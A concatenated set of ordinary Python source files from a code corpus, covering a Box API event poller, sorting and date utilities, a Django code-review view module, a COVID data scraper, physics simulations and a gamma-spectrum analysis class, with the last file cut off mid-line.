https://developer.box.com/docs/getting-started-box-integration#section-using-the-box-api\")\n sys.exit()\n\n# Grab the first positional argument to the script, use it as the Developer Token.\nauth_header = {'Authorization': 'Bearer ' + sys.argv[1]}\n\nstream_position_url = 'https://api.box.com/2.0/events?stream_position=now'\nstream_position_response = requests.get(stream_position_url, headers=auth_header)\nstream_position = None\nif (stream_position_response.status_code == 401):\n print(\"The Developer Token you have supplied is invalid or has expired. Please generate a new one - instructions can be found here: https://developer.box.com/docs/getting-started-box-integration#section-using-the-box-api\")\n sys.exit()\nelse:\n stream_position = stream_position_response.json()['next_stream_position']\n\ndef get_polling_address():\n long_poll_address = requests.options('https://api.box.com/2.0/events', headers=auth_header).json()['entries'][0]['url']\n print('realtime url: ' + long_poll_address)\n return long_poll_address\n\nlong_poll_address = get_polling_address()\n\nwhile (True):\n print('long polling...')\n params = {'stream_position': stream_position}\n long_poll = requests.get(long_poll_address, params=params)\n message = long_poll.json()['message']\n print(message)\n\n # Get a new polling address when the long polling address tells us to reconnect, and go back to the top to open a new connection to it.\n if (message == 'reconnect'):\n long_poll_address = get_polling_address()\n continue\n\n print('fetching events')\n params = {'stream_position': stream_position}\n event_details = requests.get('https://api.box.com/2.0/events', headers=auth_header, params=params).json()\n event_id = event_details['entries'][0]['event_id']\n event_type = event_details['entries'][0]['event_type']\n stream_position = event_details['next_stream_position']\n print(event_id + \" | \" + event_type)\n","sub_path":"long-poll.py","file_name":"long-poll.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26896870","text":"\ndef merge(array0, array1):\n\ti0 = 0\n\ti1 = 0\n\tout = []\n\t\n\twhile (True):\n\t\tif i0<len(array0) and i1<len(array1):\n\t\t\tif (array0[i0]<array1[i1]):\n\t\t\t\tout.append(array0[i0])\n\t\t\t\ti0+=1\n\t\t\telse:\n\t\t\t\tout.append(array1[i1])\n\t\t\t\ti1+=1\n\t\telif i0<len(array0):\n\t\t\tout.append(array0[i0])\n\t\t\ti0+=1\n\t\telif i1<len(array1):\n\t\t\tout.append(array1[i1])\n\t\t\ti1+=1\n\t\telse:\n\t\t\tbreak\n\t\n\treturn out\n\ndef sort_level(array, left, right):\n\tif (left+1>=right):\n\t\treturn [array[left]]\n\telse:\n\t\tmiddle=int((right-left)/2)+left\n\t\tarray0=sort_level(array, left, middle)\n\t\tarray1=sort_level(array, middle, right)\n\t\treturn merge(array0, array1)\n\ndef sort(array):\n\t\"\"\"\n\tmerge sort the array and return the result\n\ttime complexity: O(n*log(n))\n\t\"\"\"\n\treturn sort_level(array, 0, len(array))\n\t\n","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"70034951","text":"import time \nfrom datetime import date\nfrom datetime import datetime\n\ndef get_day():\n today = date.today()\n año = today.year\n mes = today.month\n dia = today.day\n now = datetime.now()\n dia_semana = time.strftime(\"%A\")\n hora = now.hour\n minuto = now.minute\n segundo = now.second\n return año,mes,dia,dia_semana,hora,minuto,segundo\n\n\ndef get_month(mes):\n switcher = {\n 1: \"Enero\",\n 2: \"Febrero\",\n 3: \"Marzo\",\n 4: \"Abril\",\n 5: \"Mayo\",\n 6: \"Junio\",\n 7: \"Julio\",\n 8: \"Agosto\",\n 9: \"Septiembre\",\n 10: \"Octubre\",\n 11: \"Noviembre\",\n 12: \"Diciembre\"\n }\n return switcher.get(mes)\n\n","sub_path":"get_date.py","file_name":"get_date.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"225649577","text":"####\n# Each team's file must define four tokens:\n# team_name: a string\n# strategy_name: a string\n# strategy_description: a string\n# move: A function that returns 'c' or 'b'\n####\n\nteam_name = 'MasterChef'\nstrategy_name = 'Juke'\nstrategy_description = 'Checks past history and adjusts accordingly.'\nbetrays = 0\ndef move(my_history, their_history, my_score, their_score):\n global betrays\n if len(my_history) == 0:\n return 'c'\n if their_history[-1] == 'b':\n betrays += 1\n if their_history[-1] == 'b':\n for g in range(betrays):\n return 'b'\n elif their_history[-1] == 'c':\n return 'c'","sub_path":"team6.py","file_name":"team6.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566444192","text":"\"\"\"\nConsume elasticsearch save events from kafka.\n\"\"\"\nimport jsonschema\n\nfrom .utils.kafka_consumer import kafka_consumer\nfrom .utils.init_index import init_index\nfrom .utils.config import get_config\n\n\ndef main(queue):\n \"\"\"\n Main event loop for consuming messages from Kafka and saving to elasticsearch.\n \"\"\"\n config = get_config()\n topics = [config['elasticsearch_save_topic']]\n # Message handlers based on message key\n handlers = {\n b'index': _handle_index(queue),\n b'init_index': _handle_init_index\n }\n kafka_consumer(topics, handlers)\n\n\ndef _handle_index(queue):\n \"\"\"\n Handle an event to save a new index document.\n Note that this function is curried to accept the thread queue.\n \"\"\"\n def handler(msg_data):\n print(f\"Indexing document '{msg_data['id']}' in index '{msg_data['index']}'\")\n # Save a document to an existing index\n jsonschema.validate(instance=msg_data, schema=_INDEX_SCHEMA)\n # Push the data to save into the thread queue.\n # This will be consumed by the writer thread (see ./elasticsearch_writer.py)\n queue.put(msg_data)\n return handler\n\n\ndef _handle_init_index(msg_data):\n \"\"\"Handle an event to initialize a new index with a type mapping.\"\"\"\n print(f\"Initializing index '{msg_data['name']}'\")\n # Initialize a new index with a type mapping\n jsonschema.validate(instance=msg_data, schema=_INIT_INDEX_SCHEMA)\n init_index(msg_data)\n\n\n_INDEX_SCHEMA = {\n 'type': 'object',\n 'required': ['doc', 'id', 'index'],\n 'additionalProperties': False,\n 'properties': {\n 'id': {'type': 'string'},\n 'index': {'type': 'string'},\n 'doc': {'type': 'object'}\n }\n}\n\n\n_INIT_INDEX_SCHEMA = {\n 'type': 'object',\n 'required': ['name', 'props', 'alias'],\n 'additionalProperties': False,\n 'properties': {\n 'name': {'type': 'string'},\n 'alias': {'type': 'string'},\n 'props': {'type': 'object'}\n }\n}\n","sub_path":"src/elasticsearch_consumer.py","file_name":"elasticsearch_consumer.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597154856","text":"from pymongo import MongoClient \nimport json\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\n\nmyclient = MongoClient(\"mongodb://localhost:27017/\") \n \n# database \ndb = myclient[\"Posts3\"] \ntollection = db[\"data\"] \n\nprint(tollection.find().count())\n\nref_list = defaultdict(int)\n\nfor stri in db.data.find():\n\t#print(stri)\n\tayushi = stri.get(\"@Tags\")\n\tif (ayushi != None):\n\t\tl = ayushi[1:len(ayushi) - 1].split(\"><\")\n\t\tfor k in l:\n\t\t\tref_list[k] += 1;\n\n# print(ref_list)\nfinal_list = sorted(ref_list.items(),key=lambda kv : kv[1],reverse=True)\n\nres = final_list[:10]\n\nprint(res)\nlist1, list2 = zip(*res)\n\nfig = plt.figure()\nax = fig.add_axes([0,0,1,1])\n\nax.bar(list1, list2)\nplt.show()\n","sub_path":"Part2/task1_tags_posts.py.py","file_name":"task1_tags_posts.py.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548702127","text":"import numpy as np\r\nfrom scipy.integrate import odeint\r\nimport matplotlib.pyplot as plt\r\n\r\n#global parameters\r\nMpl = 1\r\nG = 1./(8*np.pi*Mpl**2)\r\nm1 = 10**-6*Mpl\r\nm2 = 10**-1*Mpl\r\nphipk = 8*Mpl #the location of the peak of the additional gaussian potential\r\nmu = 4*Mpl^2 # sigma^2 of the additional gaussian potential\r\nalpha = 0\r\n\r\ndef V(phi,chi):\r\n return 1./2*m1**2*phi**2*(1 + alpha*np.tanh(m2*chi/Mpl**2)*np.exp(-(phi - phipk)**2/(2*mu)))\r\n\r\ndef V_phi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V(phi+eps/2,chi) - V(phi-eps/2,chi))/eps\r\n\r\ndef V_chi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V(phi,chi+eps/2) - V(phi,chi-eps/2))/eps\r\n\r\ndef d_dlna(var,lna,paras):\r\n H,phi,psi,chi,xi = var\r\n m1,m2 = paras\r\n return [(8*np.pi*G/(3*H))*(V(phi,chi) - H**2*(psi**2 + xi**2)) - H,\r\n psi,\r\n -2*psi - V_phi(phi,chi)/H**2 - (8*np.pi*G*psi/3)*(V(phi,chi)/H**2 - psi**2 - xi**2),\r\n xi,\r\n -2*xi - V_chi(phi,chi)/H**2 - (8*np.pi*G*xi/3)*(V(phi,chi)/H**2 - psi**2 - xi**2)]\r\n\r\ndef thirdH(phi,psi,chi,xi):\r\n return np.sqrt(2*V(phi,chi)/(3/(4*np.pi*G) - (psi**2 + xi**2)))\r\n\r\nphi0 = 15\r\npsi0 = 0\r\nchi0 = 0\r\nxi0 = 0\r\nH0 = thirdH(phi0,psi0,chi0,xi0)\r\nparas = [m1,m2]\r\nvar0 = [H0,phi0,psi0,chi0,xi0]\r\n\r\nlnaStop = 40\r\nnum_of_pts = 10000\r\nlnavals = np.linspace(0,lnaStop,num_of_pts)\r\n\r\nsol = odeint(d_dlna,var0,lnavals,args=(paras,))\r\nHvals = sol[:,0]\r\nphivals = sol[:,1]\r\npsivals = sol[:,2]\r\nchivals = sol[:,3]\r\nxivals = sol[:,4]\r\n\r\n\r\n\r\nplt.plot(lnavals,Hvals)\r\nplt.show()\r\n\r\n# perturbation fields\r\nepsvals = 0.5*(psivals**2 + xivals**2)\r\n\r\ndef V_phi_phi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V_phi(phi+eps/2,chi) - V_phi(phi-eps/2,chi))/eps\r\n\r\ndef V_phi_chi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V_phi(phi,chi+eps/2) - V_phi(phi,chi-eps/2))/eps\r\n\r\ndef V_chi_chi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V_chi(phi,chi+eps/2) - V_chi(phi,chi-eps/2))/eps\r\n\r\nc_11 = V_phi_phi(phivals,chivals)/Hvals**2 + (1./Hvals**2)*(2*psivals*V_phi(phivals,chivals)) + (3 - epsvals)*psivals**2\r\n\r\nc_12 = V_phi_chi(phivals,chivals)/Hvals**2 + (1./Hvals**2)*(psivals*V_chi(phivals,chivals)\r\n + xivals*V_phi(phivals,chivals))+ (3 - epsvals)*psivals*xivals\r\n\r\nc_21 = c_12\r\n\r\nc_22 = V_chi_chi(phivals,chivals)/Hvals**2 + (1./Hvals**2)*(2*xivals*V_chi(phivals,chivals)) + (3 - epsvals)*xivals**2\r\n\r\ndotavals = np.exp(lnavals)*Hvals\r\nk = 200*H0\r\n\r\n# get_val_for_given_lna, return arr(lna)\r\ndef get_val(arr,x):\r\n return np.interp(x,lnavals,arr)\r\n\r\ndef d_dlna_ij(var,lna,paras):\r\n RePsi_11, ReTheta_11, ImPsi_11, ImTheta_11, RePsi_22, ReTheta_22, ImPsi_22, ImTheta_22 = var\r\n m1, m2 = paras\r\n result = [ReTheta_11,\r\n -((1-get_val(epsvals,lna))*ReTheta_11 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*RePsi_11 + 0*get_val(c_11,lna)*RePsi_11),\r\n ImTheta_11,\r\n -((1-get_val(epsvals,lna))*ImTheta_11 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*ImPsi_11 + 0*get_val(c_11,lna)*ImPsi_11),\r\n ReTheta_22,\r\n -((1-get_val(epsvals,lna))*ReTheta_22 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*RePsi_22 + 0*get_val(c_22,lna)*RePsi_22),\r\n ImTheta_22,\r\n -((1-get_val(epsvals,lna))*ImTheta_22 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*ImPsi_22 + 0*get_val(c_22,lna)*ImPsi_22)]\r\n return result\r\n\r\nRePsi_22_0 = RePsi_11_0 = (1./np.sqrt(2*k))\r\nImPsi_22_0 = ImPsi_11_0 = 0\r\nReTheta_22_0 = ReTheta_11_0 = 0\r\nImTheta_22_0 = ImTheta_11_0 = -(1./dotavals[0])*np.sqrt(k/2)\r\n\r\nptb_init = [RePsi_11_0, ReTheta_11_0, ImPsi_11_0, ImTheta_11_0, RePsi_22_0, ReTheta_22_0, ImPsi_22_0, ImTheta_22_0]\r\n\r\nptb_sol = odeint(d_dlna_ij,ptb_init,lnavals,args=(paras,))\r\n\r\nRePsi_11_vals = ptb_sol[:,0]\r\nImPsi_11_vals = ptb_sol[:,1]\r\n\r\nplt.plot(lnavals,RePsi_11_vals/np.exp(lnavals))\r\nplt.plot(lnavals,ImPsi_11_vals/np.exp(lnavals))\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"new_pert_try_single.py","file_name":"new_pert_try_single.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"498128243","text":"# %%\ndef solution(A, B):\n L = max(A)\n P_max = max(B)\n fib = [0] * (L+2)\n fib[1] = 1\n for i in range(2, L + 2):\n fib[i] = (fib[i-1] + fib[i-2]) & ((1 << P_max) - 1)\n ladder_list = [0]*len(A)\n for i in range(len(A)):\n ladder_list[i] = fib[A[i]+1] & ((1 << B[i]) - 1)\n return ladder_list\n\n\nprint(solution([4, 4, 5, 5, 1], [3, 2, 4, 3, 1]))\n","sub_path":"ladder.py","file_name":"ladder.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"186985599","text":"from tkinter import*\r\n\r\nwindow=Tk()\r\n\r\n\r\n#=======================================================================================================\r\n\r\n\r\nTitletxt= StringVar()\r\nYeartxt= StringVar()\r\nAuthortxt= StringVar()\r\nISBNtxt= StringVar()\r\n\r\n#======================================================================================================\r\n\r\nL1=Label(window,text=\"Title\")\r\nL1.grid(row=0,column=0)\r\nT1=Entry(window,textvariable=Titletxt)\r\nT1.grid(row=0,column=1)\r\n\r\nL2=Label(window,text=\"Year\")\r\nL2.grid(row=1,column=0)\r\nT2=Entry(window,textvariable=Yeartxt)\r\nT2.grid(row=1,column=1)\r\n\r\nL3=Label(window,text=\"Author\")\r\nL3.grid(row=0,column=2)\r\nT3=Entry(window,textvariable=Authortxt)\r\nT3.grid(row=0,column=3)\r\n\r\nL4=Label(window,text=\"ISBN\")\r\nL4.grid(row=1,column=2)\r\nT4=Entry(window,textvariable=ISBNtxt)\r\nT4.grid(row=1,column=3)\r\n\r\nlist1=Listbox(window, height=6,width=35)\r\nlist1.grid(row=2,column=0,rowspan=5,columnspan=2)\r\n\r\nsb1=Scrollbar(window)\r\nsb1.grid(row=2,column=2,rowspan=6)\r\n\r\nlist1.configure(yscrollcommand=sb1.set)\r\nsb1.configure(command=list1.yview)\r\n\r\nB1=Button(window,text=\"View all\",width=12)\r\nB1.grid(row=2,column=3)\r\nB2=Button(window,text=\"Search entry\",width=12)\r\nB2.grid(row=3,column=3)\r\nB3=Button(window,text=\"Add entry\",width=12)\r\nB3.grid(row=4,column=3)\r\nB4=Button(window,text=\"Update selected\",width=12)\r\nB4.grid(row=5,column=3)\r\nB5=Button(window,text=\"Delete selected\",width=12)\r\nB5.grid(row=6,column=3)\r\nB6=Button(window,text=\"Close\",width=12)\r\nB6.grid(row=7,column=3)\r\n\r\nwindow.mainloop()\r\n","sub_path":"script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"550181754","text":"# from django.shortcuts import render_to_response\nfrom django.shortcuts import render\nfrom django.template import RequestContext\n# from django.utils import simplejson\ntry:\n import django.utils.simplejson\nexcept:\n import json as simplejson\n\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.core import serializers\nfrom django.db.models import Q\nfrom datetime import datetime\n\nfrom project_management.code_review.models import *\nfrom project_management.projects.models import ProjectMembership\n\n\n@login_required\ndef edit(request, code_review_id):\n code_review = CodeReview.objects.filter(id=code_review_id)\n team_members = Project.objects.get(\\\n id=code_review[0].project.id).team.filter(is_active=1).order_by('first_name')\n code_review_json = serializers.serialize(\"json\", code_review)\n team_members_json = serializers.serialize(\"json\", team_members)\n code_review_dict = [{\n 'code_review':code_review_json,\n 'team_members':team_members_json}]\n json = simplejson.dumps(code_review_dict)\n return HttpResponse(json, mimetype='application/json')\n\n\n@login_required\ndef get_team_members(request, project_id=None):\n if project_id != '' and project_id != None:\n '''\n Get team members for selected project\n '''\n team_members = Project.objects.get(\\\n id=project_id).team.filter(is_active=1).distinct().order_by('first_name')\n else:\n '''\n Get team members of a login user's all project, which are he included\n '''\n team_member_list = []\n [team_member_list.extend(each.team.filter(is_active=1).distinct().order_by(\\\n 'first_name')) for each in\n Project.objects.filter(Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n .filter(is_active=1).distinct().exclude(cancel=True)]\n team_members = set(team_member_list)\n data = serializers.serialize(\"json\", team_members)\n json = simplejson.dumps(data)\n return HttpResponse(json, mimetype='application/javascript')\n\n\n@login_required\ndef save_review(request):\n patch = int(request.POST.get('patch'))\\\n if request.POST.get('patch') else None\n code_review = CodeReview.objects.filter(\\\n id=request.POST.get('code_review_id', ''))\n code_review_dict = {\n 'id': None if len(code_review) == 0 else code_review[0].id,\n 'reviewer_id': request.POST.get('reviewer', ''),\n 'engineer_id': request.POST.get('engineer', ''),\n 'project_id': request.POST.get('project', ''),\n 'review_date': request.POST.get('review_date', ''),\n 'patch_code': request.POST.get('patch_code', ''),\n 'patch': patch,\n 'build': int(request.POST.get('build'))\n if patch == 1 and request.POST.get('build') else None,\n 'test_case': int(request.POST.get('testcase'))\n if patch == 1 and request.POST.get('testcase') else None,\n 'comments': request.POST.get('comments', ''),\n 'modified_by_id': request.user.id,\n 'created_by_id': request.user.id\n if len(code_review) == 0 else code_review[0].created_by.id,\n 'created_on': datetime.now().date()\n if len(code_review) == 0 else code_review[0].created_on,\n }\n code_review = CodeReview(**code_review_dict)\n code_review.save()\n return HttpResponseRedirect(reverse('codereview:list'))\n\n\n@login_required\ndef code_review_list(request):\n selected_project = ''\n selected_eng = ''\n search_reviewer = ''\n selected_patch = ''\n selected_build = ''\n selected_testcase = ''\n selected_from_date = ''\n selected_to_date = ''\n\n '''\n Get last updated code review's project, team and engineer.\n '''\n last_updated_pjt = ''\n code_review_list = CodeReview.objects.filter(\\\n reviewer=request.user.id).order_by('-modified_on')\n last_updated_pjt_team = []\n last_updated_eng = ''\n if len(code_review_list) > 0:\n last_updated_pjt = code_review_list[0].project.id\n last_updated_eng = code_review_list[0].engineer.id\n last_updated_pjt_team = Project.objects.get(is_active=1,\n id=last_updated_pjt).team.filter(is_active=1).distinct().order_by(\\\n 'first_name')\n query = Q(is_active = True) & Q(project__in = Project.objects.filter(\\\n Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n .filter(is_active=True).distinct().exclude(cancel=True).values('id'))\n if request.GET.get('search') == 'search':\n '''\n Form filter query for code review list, with search options.\n '''\n selected_from_date = request.POST.get('from_date', '')\n selected_to_date = request.POST.get('to_date', '')\n if request.POST.get('search_project', '') != '':\n selected_project = Project.objects.get(is_active=1,\\\n id=request.POST.get('search_project', '')).id\n query = query & Q(project = selected_project)\n if request.POST.get('search_engineer', '') != '':\n selected_eng = User.objects.get(is_active=1,\\\n id=request.POST.get('search_engineer', '')).id\n query = query & Q(engineer = selected_eng)\n if request.POST.get(\"search_reviewer\", '') != '':\n search_reviewer = User.objects.get(is_active=1,\\\n id=request.POST.get(\"search_reviewer\", '')).id\n query = query & Q(reviewer = search_reviewer)\n if selected_from_date != '':\n query = query & Q(review_date__gte = selected_from_date)\n if selected_to_date != '':\n query = query & Q(review_date__lte = selected_to_date)\n if request.POST.get(\"search_patch\", '') != '':\n selected_patch = request.POST.get(\"search_patch\", '')\n query = query & Q(patch = selected_patch\n if selected_patch != '2' else None)\n if request.POST.get(\"search_build\", '') != '':\n selected_build = request.POST.get(\"search_build\", '')\n query = query & Q(build = selected_build\n if selected_build != '2' else None)\n if request.POST.get(\"search_testcase\", '') != '':\n selected_testcase = request.POST.get(\"search_testcase\", '')\n query = query & Q(test_case = selected_testcase\n if selected_testcase != '2' else None)\n\n else:\n '''\n Form filter query with last entered project for code\n review and login user\n '''\n search_reviewer = request.user.id\n query = query & Q(reviewer = search_reviewer)\n if len(code_review_list) > 0:\n selected_project = last_updated_pjt\n query = query & Q(project = selected_project)\n code_review = CodeReview.objects.filter(\\\n query).order_by('-modified_on')\n projects = Project.objects.filter(Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n .filter(is_active=1).distinct().exclude(cancel=True)\n if selected_project != '':\n '''\n Get team_members of login user's last entered project .\n '''\n team_members = Project.objects.get(is_active=1, id=selected_project).\\\n team.filter(is_active=1).distinct().order_by('first_name')\n else:\n '''\n At the first time access of code review page, get team members of a\n login user's all project, which are he included\n '''\n team_member_list = []\n [team_member_list.extend(each.team.filter(is_active=1).distinct().order_by(\\\n 'first_name')) for each in\n Project.objects.filter(Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n .filter(is_active=1).distinct().exclude(cancel=True)]\n team_members = set(team_member_list)\n page_data = {\n 'projects': projects,\n 'code_review': code_review,\n 'team_members': team_members,\n 'selected_project': selected_project,\n 'search_reviewer': search_reviewer,\n 'selected_eng': selected_eng,\n 'selected_patch': selected_patch,\n 'selected_build': selected_build,\n 'selected_testcase': selected_testcase,\n 'selected_from_date': selected_from_date,\n 'selected_to_date': selected_to_date,\n 'last_updated_pjt': last_updated_pjt,\n 'last_updated_pjt_team': last_updated_pjt_team \n if len(last_updated_pjt_team) > 0 else team_members,\n 'last_updated_eng': last_updated_eng,\n }\n return render(request, 'code_review.html', {'page_data': page_data},\n )\n","sub_path":"project_management/code_review/views1.py","file_name":"views1.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"161791400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 16 15:03:06 2021\n\n@author: EduardoWork\n\"\"\"\n\nfrom datetime import datetime\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nfrom scrape_sc_cov import extract_cov_data\nfrom scrape_sc_cov import get_elements_from_news_page\nfrom scrape_sc_cov import save_info\nfrom parse_sc_cov import parse_info\n\n\ndef check_new():\n \"\"\"Verifica se o database está atualizado.\n\n Returns\n -------\n new_elements (list): lista com os links dos novos dados\n \"\"\"\n parsed = parse_info('covid_sc_casos.csv') # list of dicts, in Pandas DataFrame\n last_date = parsed.max() # date in datetime, in Pandas DataFrame\n\n updated = False\n new_elements = []\n i = 0\n\n while not updated:\n\n # element: link com dados a serem extraídos\n elements = get_elements_from_news_page(\n 'https://www.sc.gov.br/noticias/temas/coronavirus?start=' +\n str(i) + str(0)\n )\n\n for element in elements:\n\n # Pegar data\n site = requests.get('https://www.sc.gov.br' + element,\n headers={'User-Agent': 'Custom'})\n soup = bs(site.content, features=\"lxml\")\n current_date = datetime.fromisoformat(soup.time['datetime'])\n # Se é mais novo, adicionar. Caso contrário, updated = True\n if (current_date > last_date).bool():\n new_elements.append(element)\n else:\n updated = True\n\n i += 1\n\n return new_elements\n\n\ndef update():\n \"\"\"Verifica se o database está atualizado. Se não estiver, atualiza.\"\"\"\n new = check_new()\n if len(new) == 0:\n print('Database is already updated')\n else:\n for element in new:\n casos, mortes = extract_cov_data(element)\n save_info(casos, mortes)\n print('Datebase was updated')\n\n\nif __name__ == '__main__':\n update()\n","sub_path":"update_sc_cov.py","file_name":"update_sc_cov.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"324075618","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nclass Spectra_Analysis():\n figure_number=1\n def __init__(self,foreground_location, \n background_location=None,\n zero_offset_fore=6,zero_offset_back=6,\n save_folder=None):\n '''\n Used to analyze various spectral features:\n Takes as arguements:\n foreground_location- string of the full path to uncalibrated\n spectrum files. Expects to only have \n a single column of the counts\n having length of number of bins\n background_location- string of full path to uncalibrated\n background spectrum. Expects same \n information as foreground_location \n zero_offset_fore- int indicating start line in the \n foreground spectrum\n zero_offset_back- int indicating start line in the \n background spectrum\n save_folder- full path to the folder to save images in \n '''\n super().__init__()\n #read in the foreground spectrum and create an associated bins\n #array to go with it\n f=open(foreground_location,'r')\n f_data=f.readlines()\n f.close()\n self.fore_bins=[]\n self.fore_counts=[]\n for i in range(zero_offset_fore,len(f_data)):\n self.fore_bins.append(i)\n self.fore_counts.append(float(f_data[i]))\n #if a background file exists read in the data \n self.back_bins=[]\n self.back_counts=[]\n if background_location!=None:\n g=open(background_location,'r')\n b_data=g.readlines()\n g.close()\n for j in range(zero_offset_back,len(b_data)):\n self.back_bins.append(j)\n self.back_counts.append(float(b_data[j]))\n if save_folder==None:\n self.save_folder=os.getcwd()\n else:\n self.save_folder=save_folder\n \n def average_count_rate(self,foreground_duration, background_duration=None):\n '''Calculate the average count rate for the foreground and \n backgound if included.\n Takes as arguments:\n foreground_duration- float of foreground accumulation time\n background_duration- float of background accumulation time\n defaults to None\n '''\n fore_sum=np.sum(self.fore_counts)\n fore_rate=fore_sum/foreground_duration\n if len(self.back_counts)!=0:\n back_sum=np.sum(self.back_counts) \n back_rate=back_sum/background_duration\n return fore_rate,back_rate\n else:\n return fore_rate,0\n \n def background_subtraction(self):\n '''\n Subtract the background from the foreground to see the total signature\n '''\n if len(self.back_bins)!=len(self.fore_bins):\n raise ValueError('Background of length {}, can\\'t be substracted from Foreground of length {}'.format(len(self.back_bins),len(self.fore_bins)))\n else:\n self.subtracted_counts=[]\n for h in range(len(self.back_bins)):\n self.subtracted_counts.append(\n self.fore_counts[h]-self.back_counts[h])\n \n def rate_normalization(self,fore_duration,back_duration):\n '''Used to rate normalize the two spectrum\n Takes as arguments:\n fore_duration- float duration of foreground accumulation\n back_duration- float duration of background accumulation\n '''\n self.fore_rates=[i/fore_duration for i in self.fore_counts]\n self.back_rates=[j/back_duration for j in self.back_counts]\n \n def raw_spectrum_plotter(self, first_label,title,second_label=None,yscale='linear'):\n '''\n Plot the raw foreground and background on top of each other \n Takes as arguments:\n first_label: string of first spectrum label\n second_label: string of second spectrum label\n title: descriptive title of the graph\n '''\n plt.figure(self.figure_number,figsize=[12,12])\n self.figure_number+=1\n if second_label!=None:\n plt.plot(self.back_bins,self.back_counts,label=second_label)\n plt.plot(self.fore_bins,self.fore_counts,label=first_label)\n plt.xlabel('Bins')\n plt.ylabel('Counts')\n plt.yscale(yscale)\n plt.title(title)\n plt.legend()\n plt.savefig(os.path.join(self.save_folder,\n '{}_{}.jpg'.format(title,yscale)),dpi=600)\n plt.show()\n \n def rate_spectrum_plotter(self, first_label, second_label,title):\n '''\n Plot the raw foreground and background on top of each other \n Takes as arguments:\n first_label: string of first spectrum label\n second_label: string of second spectrum label\n title: descriptive title of the graph\n '''\n plt.figure(self.figure_number)\n self.figure_number+=1\n plt.plot(self.back_rates,self.back_counts,label=first_label)\n plt.plot(self.fore_rates,self.fore_counts,label=second_label)\n plt.xlabel('Bins')\n plt.ylabel('Counts Rates')\n plt.title(title)\n plt.show()\n \n def calibrated_spectrum_plotter(self, first_label, title,calibrate,\n second_label=None,yscale='linear',\n energies=None,zoomed=None,\n back_calibration=None,\n xtick_remove=None,\n calibration_lines=None):\n plt.figure(self.figure_number,figsize=[12,5.5])\n self.figure_number+=1\n zoomer=[]\n zoomed_calibrate=[]\n zoomer_back=[]\n zoomed_back2=[]\n zoomed_back=[]\n if zoomed!=None:\n for j in range(len(calibrate)):\n if calibrate[j]>= min(zoomed) and calibrate[j]<=max(zoomed):\n zoomer.append(calibrate[j])\n zoomed_calibrate.append(self.fore_counts[j])\n if second_label!=None:\n zoomed_back.append(self.back_counts[j])\n if back_calibration!=None and second_label!=None:\n for k in range(len(back_calibration)):\n if back_calibration[k]>=min(zoomed) and back_calibration[k]<=max(zoomed):\n zoomer_back.append(back_calibration[k])\n zoomed_back2.append(self.back_counts[k])\n \n if len(zoomer)>0:\n if second_label!=None:\n if back_calibration==None:\n plt.plot(zoomer,zoomed_back,label=second_label)\n else:\n plt.plot(zoomer_back,zoomed_back2,label=second_label)\n plt.plot(zoomer,zoomed_calibrate,label=first_label)\n plt.xlim(zoomed[0],zoomed[1])\n else:\n if second_label!=None:\n if back_calibration==None:\n plt.plot(calibrate,self.back_counts,label=second_label)\n else:\n plt.plot(back_calibration,self.back_counts,label=second_label)\n \n plt.plot(calibrate,self.fore_counts,label=first_label)\n \n #add the energy lines to the graph\n if energies!=None:\n for i in energies:\n plt.axvline(x=i,linestyle='--',color='k',linewidth=0.5)\n loc,label=plt.xticks()\n for i in range(len(loc)-1):\n if loc[i]>=0:\n if round(loc[i],3)!=xtick_remove:\n energies.append(loc[i])\n plt.xticks(energies,fontsize=10, 